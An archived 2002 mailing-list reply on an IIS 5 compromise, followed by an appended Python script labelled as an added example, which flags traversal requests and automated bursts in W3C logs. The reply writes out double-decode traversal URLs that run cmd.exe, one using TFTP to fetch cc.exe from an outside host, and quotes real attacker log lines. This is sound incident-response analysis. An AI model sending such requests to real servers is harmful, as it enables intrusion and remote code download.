Security Incidents mailing list archives

Re: Can anyone identify this backdoor?


From: Matt Scarborough <vexversa () verizon net>
Date: Fri, 12 Jul 2002 04:25:54 +0000

On Thu, 11 Jul 2002 10:09:28 -0500, "Matt Andreko" wrote:

> I have been asked by many to see the logs.  I have also posted them to
> the website at http://www.criminalsmostly.com/~mandreko/logs.zip (didn't
> want to post a really really long post).
>
> I appreciate all the responses I'm getting; I'm finding out more that I
> did not know about this little file.  I'm mainly trying to figure out
> how it got there, and where it came from.

On an unrelated note, this server is Windows 2000 and not vulnerable to the
HK.EXE exploit (patched by MS00-003). Richard Bartlett's descriptions of the
toolkit seem a likely explanation.

As to how cc.exe got there, the logs referenced above show the server
vulnerable to the double-decode bug (patched by MS01-026).

For example
HTTP://<IP_ADDR>/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: 
will leave a 200 response from IIS 5 in the logs and actually transfer the
file CMD.EXE to the attacker. This behavior is a change from the Unicode bug
(patched by MS00-086), which would have returned a directory listing to the
attacker.

Additionally, the familiar
HTTP://<IP_ADDR>/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+cmd2.exe
will leave a 502 response from IIS 5 in the logs, and output to the attacker

CGI Error

The specified CGI application misbehaved by not returning a complete set of
HTTP headers. The headers it did return are:

        1 file(s) copied.

The attack URLs above, sent to a server vulnerable to the double-decode bug,
are consistent with your ex020522.log:

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2002-05-22 12:05:49
#Fields: time c-ip cs-method cs-uri-stem sc-status 
<snip>
12:05:49 212.179.250.122 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe 502
12:05:52 212.179.250.122 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 200
12:06:55 212.179.250.122 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 502
12:07:20 212.179.250.122 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 502
12:10:51 212.179.250.122 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 502

As such, the attack URL
HTTP://<IP_ADDR>/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+tftp+-i+<IP_ADDR>+GET+cc.exe+C:\winnt\system32\cc.exe
could have transferred the file cc.exe to the victim server using TFTP.
Since you are not logging cs-uri-query, we cannot be sure which commands
successfully returned the 200 or 502 responses.

As preliminary guesswork only, most of the other logs indicate automated
tools (several requests within the span of a second or two). The compromise
*seems* to have been mounted from the same ADSL netblock. Inspection of the
logs *seems* to reveal an automated tool first, run on two successive days,
followed by a manual attack, all originating from that same IP block.

Matt Scarborough 2002-07-12
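An added example, not part of Matt Scarborough's post or of the logs he refers to: a small Python checker that does the triage the post describes by hand. It parses an IIS 5 W3C extended log using its #Fields header, percent-decodes each cs-uri-stem repeatedly so that %255c (two passes) is distinguished from %5c (one pass), maps the overlong %c0%af / %c1%9c sequences of the Unicode bug to a separator before decoding, flags requests whose decoded path climbs out of the script directory, reads the 200 / 502 status the way the post reads it, and lists client IPs that fired several requests within a second or two. The five log lines quoted in the post are embedded as sample input together with constructed lines (the 10.0.0.x clients and their stems are made up for illustration); cs-uri-query is assumed absent, exactly as in the quoted #Fields line, so the command after "cmd.exe?/c+" is never visible.

```python
"""IIS 5 W3C-log triage for double-decode / Unicode traversal requests.
Added example for this thread, not code from the original post.  Assumes the
#Fields header quoted in the thread; cs-uri-query is not logged."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Sample input: the five lines quoted in the post plus constructed lines
# (the 10.0.0.x clients and their stems are made up for illustration).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2002-05-22 12:05:49
#Fields: time c-ip cs-method cs-uri-stem sc-status
12:05:49 212.179.250.122 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe 502
12:05:52 212.179.250.122 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 200
12:06:55 212.179.250.122 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 502
12:07:20 212.179.250.122 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 502
12:10:51 212.179.250.122 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 502
12:11:00 10.0.0.5 GET /default.htm 200
12:11:00 10.0.0.9 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe 200
12:11:01 10.0.0.9 GET /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe 200
12:11:01 10.0.0.9 GET /msadc/..%255c..%255c..%255cwinnt/system32/cmd.exe 502
"""

# Overlong UTF-8 forms of '/' and '\' used by the Unicode bug (MS00-086).
# Python's decoder rejects them, so they are mapped to '/' before decoding.
OVERLONG = re.compile(r"%c0%af|%c1%9c", re.I)

# How the post reads the status of a cmd.exe request (query not logged).
VERDICT = {
    "200": "cmd.exe itself served to the client (double-decode behaviour)",
    "502": "CGI Error: a command ran and returned output without headers",
}


def parse_w3c(text):
    """Parse W3C extended format into dicts keyed by the #Fields names."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            vals = line.split()
            if len(vals) == len(fields):      # skip truncated/malformed lines
                records.append(dict(zip(fields, vals)))
    return records


def decode_rounds(raw, limit=3):
    """Percent-decode until stable; len(result) - 1 is the number of passes.
    %255c needs two passes (%255c -> %5c -> backslash), %5c needs one."""
    rounds = [raw]
    for _ in range(limit):
        nxt = unquote(rounds[-1])
        if nxt == rounds[-1]:
            break
        rounds.append(nxt)
    return rounds


def traversal_target(raw_stem):
    """Return details if the fully decoded stem escapes its directory."""
    overlong = bool(OVERLONG.search(raw_stem))
    rounds = decode_rounds(OVERLONG.sub("/", raw_stem))
    norm = rounds[-1].replace("\\", "/")
    segs = norm.split("/")
    if ".." not in segs:
        return None
    return {"path": norm, "passes": len(rounds) - 1,
            "overlong": overlong, "target": segs[-1].lower()}


def find_traversal(records):
    """Records whose stem traverses, with the post's status interpretation."""
    hits = []
    for r in records:
        t = traversal_target(r["cs-uri-stem"])
        if t:
            status = r["sc-status"]
            note = VERDICT.get(status, f"no execution evidence ({status})")
            hits.append({**r, **t, "verdict": note})
    return hits


def burst_sources(records, window=2, min_hits=3):
    """Client IPs that sent >= min_hits requests inside `window` seconds:
    the 'several requests within a second or two' signature of a scanner."""
    by_ip = defaultdict(list)
    for r in records:
        t = datetime.strptime(r["time"], "%H:%M:%S")
        by_ip[r["c-ip"]].append(t.hour * 3600 + t.minute * 60 + t.second)
    bursty = []
    for ip, times in by_ip.items():
        times.sort()
        if any(times[i + min_hits - 1] - times[i] <= window
               for i in range(len(times) - min_hits + 1)):
            bursty.append(ip)
    return sorted(bursty)


if __name__ == "__main__":
    recs = parse_w3c(SAMPLE_LOG)
    for h in find_traversal(recs):
        print(f'{h["time"]} {h["c-ip"]:16} passes={h["passes"]} '
              f'overlong={h["overlong"]} {h["path"]} '
              f'[{h["sc-status"]}: {h["verdict"]}]')
    print("burst sources (likely automated):", burst_sources(recs))
```

Two caveats when running this over real logs: IIS writes cs-uri-stem after its own first decoding pass, which is why the post's %255c requests appear as %5c in the quoted log, so the pass count is relative to what was logged rather than to what the attacker sent; and without cs-uri-query the 200 / 502 reading is only the interpretation given in the post, not proof of which command ran.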

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
